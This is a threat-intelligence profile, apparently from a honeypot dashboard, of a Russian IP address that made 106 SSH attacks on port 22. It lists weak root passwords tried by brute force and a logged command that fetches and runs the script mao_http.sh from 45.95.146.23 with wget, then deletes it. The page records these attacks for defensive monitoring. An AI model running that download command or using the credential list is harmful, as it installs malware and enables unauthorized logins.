Active Threat โ€ข MEDIUM

5.142.110.157

First Detection2/21/2026
Last Activity2/21/2026
ISPRostelecom
๐ŸŽฏ
106
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
3
Malware

Geolocation

Country
๐Ÿ‡ท๐Ÿ‡บ Russia
City
Kotlas
ASN
AS12389
ISP
Rostelecom

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

๐Ÿ”root/1234567890
1x
๐Ÿ”root/user
1x
๐Ÿ”root/test
1x
๐Ÿ”root/111111
1x
๐Ÿ”root/debian
1x
๐Ÿ”root/12345
1x
๐Ÿ”root/guest
1x
๐Ÿ”root/centos
1x
๐Ÿ”root/000000
1x
๐Ÿ”root/1234
1x
๐Ÿ”root/admin
1x
๐Ÿ”root/root
1x
๐Ÿ”root/123456
1x
๐Ÿ”root/1234567
1x
๐Ÿ”root/123123
1x

Executed Commands

$mount | head -51x
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.146.23/mao_http.sh; chmod 777 mao_http.sh; sh mao_http.sh; rm -rf mao_http.sh1x

Risk Assessment

50
/100
LowMediumHighCritical